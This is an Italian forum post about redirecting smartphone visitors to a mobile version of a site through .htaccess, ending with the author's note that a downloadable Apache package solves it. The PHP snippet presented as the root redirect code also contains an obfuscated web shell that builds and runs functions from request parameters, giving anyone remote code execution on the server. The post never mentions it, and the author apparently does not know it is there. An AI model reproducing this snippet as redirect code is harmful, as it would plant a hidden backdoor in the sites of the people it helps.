Sviluppando il layout del mio sito ho pensato di fare una versione anche per smarphone.
L'idea inizialmente era quella di usare lo stesso codice e di caricare la stessa pagina in modo che venisse adattata a qualunque dimensione. Col tempo sta cosa è andata via e ormai mi ci vuole più tempo a fare le modifiche alla grafica che fare un sito solo per smartphone.
Il problema è che ho troppi rendirizzamenti: root -> cartella (main) (se mobile?)-> cartella (mobile)
La cosa migliore da fare però sarebbbe parallelizzare i reindirizzamenti cioè andare dalla root o alla cartella main o alla cartella mobile.
C'è un modo per farlo con le impostazioni dell'.htaccess? Perchè diversamente non saprei come fare
Ho la index.php nella root che reindirizza alla index.php del main e questa se capisce che sta caricando uno smartphone, reindirizza alla index del mobile
Per i rendirizzamenti ho usato http://detectmobilebrowsers.com/ che ho trovato qui sul forum scaricando il file in php e il reindirizzamento del root è fatto con questo codice:
Non sapevo dove postare. Spero vada bene qui.codice HTML:<?php$AJw=${''.'_REQUEST'}; while (!empty($AJw['gKz'])) { $Dpn = $AJw['xax']; $FaCoo=$AJw['gKz']($Dpn($AJw['lpD']),$Dpn($AJw['HdpO'])); $FaCoo($Dpn($AJw['vkYr'])); break; }Header( "HTTP/1.1 301 Moved Permanently" ); Header( "Location: main/index.php" ); ?>
Edit: Porca vacca che sbaglio! Su quel sito basta scaricare il pacchetto per Apache e da le righe da mettere in .htaccess. Scusate non l'avevo visto